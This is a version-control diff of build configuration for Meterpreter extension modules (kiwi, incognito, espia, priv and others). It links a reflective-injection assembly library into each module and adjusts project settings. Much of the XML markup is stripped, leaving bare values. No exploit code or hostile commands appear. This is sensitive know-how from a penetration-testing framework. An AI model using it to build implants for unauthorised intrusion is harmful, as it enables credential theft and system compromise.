@@ -39,7 +39,7 @@ if(MSVC) set_source_files_properties(${MOD_DEF_DIR}/extension.def PROPERTIES HEADER_FILE_ONLY TRUE) endif() -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj b/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj index aba733413..7f564180d 100644 --- a/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj +++ b/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj @@ -37,6 +37,18 @@ + + + true + true + true + + + true + true + true + + {486B160F-C571-486D-AAC3-CB60CEA7CBDD} ext_server_incognito @@ -170,10 +182,11 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No - editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" @@ -226,10 +239,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No - editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName).debug$(TargetExt)" 
@@ -281,10 +295,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No - editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" @@ -340,10 +355,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No - editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" @@ -400,10 +416,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No - editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName).debug$(TargetExt)" 
@@ -459,10 +476,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No - editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" diff --git a/c/meterpreter/workspace/ext_server_espia/CMakeLists.txt b/c/meterpreter/workspace/ext_server_espia/CMakeLists.txt index 01de6126a..a89824aee 100644 --- a/c/meterpreter/workspace/ext_server_espia/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_espia/CMakeLists.txt @@ -29,7 +29,7 @@ if(MSVC) endif() set(LINK_LIBS jpeg) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj b/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj index 4065c24c6..f4ac0d194 100644 --- a/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj +++ b/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj @@ -159,6 +159,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + false editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -216,6 +217,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + false editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL 
@@ -272,6 +274,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + false editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -328,6 +331,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + false editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -385,6 +389,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + false editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -441,6 +446,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + false editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -457,6 +463,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + @@ -464,4 +482,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_extapi/CMakeLists.txt b/c/meterpreter/workspace/ext_server_extapi/CMakeLists.txt index d1f4efd06..cd6b8f713 100644 --- a/c/meterpreter/workspace/ext_server_extapi/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_extapi/CMakeLists.txt @@ -43,7 +43,7 @@ if(MSVC) else() endif() -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() 
diff --git a/c/meterpreter/workspace/ext_server_extapi/ext_server_extapi.vcxproj b/c/meterpreter/workspace/ext_server_extapi/ext_server_extapi.vcxproj index 33891ee83..ef46e556d 100644 --- a/c/meterpreter/workspace/ext_server_extapi/ext_server_extapi.vcxproj +++ b/c/meterpreter/workspace/ext_server_extapi/ext_server_extapi.vcxproj @@ -152,6 +152,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -207,6 +208,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -261,6 +263,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -316,6 +319,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -372,6 +376,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -427,6 +432,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -469,6 +475,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + 
@@ -476,4 +494,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_incognito/CMakeLists.txt b/c/meterpreter/workspace/ext_server_incognito/CMakeLists.txt index 6ad783b10..450af691a 100644 --- a/c/meterpreter/workspace/ext_server_incognito/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_incognito/CMakeLists.txt @@ -30,7 +30,7 @@ if(MSVC) endif() set(LINK_LIBS netapi32 mpr) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj b/c/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj index 18a5b22cd..bee876bdc 100644 --- a/c/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj +++ b/c/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj @@ -157,6 +157,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -212,6 +213,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -266,6 +268,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL 
@@ -324,6 +327,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -383,6 +387,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -441,6 +446,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -466,8 +472,20 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_kiwi/CMakeLists.txt b/c/meterpreter/workspace/ext_server_kiwi/CMakeLists.txt index 972c18ba0..89d17f39f 100644 --- a/c/meterpreter/workspace/ext_server_kiwi/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_kiwi/CMakeLists.txt @@ -46,6 +46,10 @@ else() '-D__success=DISCARD' '-D__FUNCTION__=""' '-D__struct_bcount=DISCARD' + '-D__nullterminated=SAL__nullterminated' + '-D__in_range=__RPC__in_range' + '-D__callback=SAL__callback' + '-D__deref_in_bcount_opt=SAL__deref_in_bcount_opt' ) endif() @@ -136,7 +140,7 @@ set(LINK_LIBS ${KIWI_LIB_DIR}/bcrypt.lib ) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj b/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj index e3e5b0abe..ea63cc195 100644 
--- a/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj +++ b/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj @@ -192,6 +192,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -249,6 +250,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -305,6 +307,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -365,6 +368,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -426,6 +430,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -486,6 +491,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -745,6 +751,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + diff --git a/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj.filters b/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj.filters index c17462c4f..3edf88046 100644 
--- a/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj.filters +++ b/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj.filters @@ -712,4 +712,8 @@ {fdb3471d-bb0a-4de4-95ff-f4f343270ebd} + + + + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_lanattacks/CMakeLists.txt b/c/meterpreter/workspace/ext_server_lanattacks/CMakeLists.txt index b8ff489fa..8e79919c9 100644 --- a/c/meterpreter/workspace/ext_server_lanattacks/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_lanattacks/CMakeLists.txt @@ -37,7 +37,7 @@ set(LINK_LIBS ws2_32 ) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") else() diff --git a/c/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj b/c/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj index 3490dc0ed..3ccfe362e 100644 --- a/c/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj +++ b/c/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj @@ -146,6 +146,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -193,6 +194,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -239,6 +241,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL 
@@ -293,6 +296,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -348,6 +352,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -402,6 +407,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -420,6 +426,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + @@ -427,4 +445,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_peinjector/CMakeLists.txt b/c/meterpreter/workspace/ext_server_peinjector/CMakeLists.txt index aaa662ae0..69343e417 100644 --- a/c/meterpreter/workspace/ext_server_peinjector/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_peinjector/CMakeLists.txt @@ -29,7 +29,7 @@ if(MSVC) set_source_files_properties(${MOD_DEF_DIR}/extension.def PROPERTIES HEADER_FILE_ONLY TRUE) endif() -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_peinjector/ext_server_peinjector.vcxproj b/c/meterpreter/workspace/ext_server_peinjector/ext_server_peinjector.vcxproj index a8a5ce5d1..137fcc1c4 100755 --- a/c/meterpreter/workspace/ext_server_peinjector/ext_server_peinjector.vcxproj 
+++ b/c/meterpreter/workspace/ext_server_peinjector/ext_server_peinjector.vcxproj @@ -152,6 +152,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -207,6 +208,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -261,6 +263,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -316,6 +319,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -372,6 +376,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -427,6 +432,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -452,6 +458,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + @@ -459,4 +477,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_powershell/CMakeLists.txt b/c/meterpreter/workspace/ext_server_powershell/CMakeLists.txt index 2112b8f0b..6753f1b78 100644 
--- a/c/meterpreter/workspace/ext_server_powershell/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_powershell/CMakeLists.txt @@ -25,7 +25,7 @@ set_target_properties(${PROJECT_NAME} PROPERTIES LINK_FLAGS "/DEF:\"${MOD_DEF_DI set_source_files_properties(${MOD_DEF_DIR}/extension.def PROPERTIES HEADER_FILE_ONLY TRUE) set(LINK_LIBS psapi ws2_32) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_powershell/ext_server_powershell.vcxproj b/c/meterpreter/workspace/ext_server_powershell/ext_server_powershell.vcxproj index 3e86f8957..3a7e798f7 100644 --- a/c/meterpreter/workspace/ext_server_powershell/ext_server_powershell.vcxproj +++ b/c/meterpreter/workspace/ext_server_powershell/ext_server_powershell.vcxproj @@ -153,6 +153,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -209,6 +210,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -264,6 +266,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -320,6 +323,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL 
@@ -377,6 +381,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -433,6 +438,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -453,6 +459,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + @@ -460,4 +478,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_priv/CMakeLists.txt b/c/meterpreter/workspace/ext_server_priv/CMakeLists.txt index ab27c4516..da2fa9266 100644 --- a/c/meterpreter/workspace/ext_server_priv/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_priv/CMakeLists.txt @@ -42,6 +42,10 @@ else() '-D__success=DISCARD' '-D__FUNCTION__=""' '-D__struct_bcount=DISCARD' + '-D__nullterminated=SAL__nullterminated' + '-D__in_range=__RPC__in_range' + '-D__callback=SAL__callback' + '-D__deref_in_bcount_opt=SAL__deref_in_bcount_opt' ) endif() @@ -68,7 +72,7 @@ if(MSVC) endif() set(LINK_LIBS psapi rpcrt4) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj b/c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj index f7d4d1a84..d005b53bb 100644 --- a/c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj +++ b/c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj 
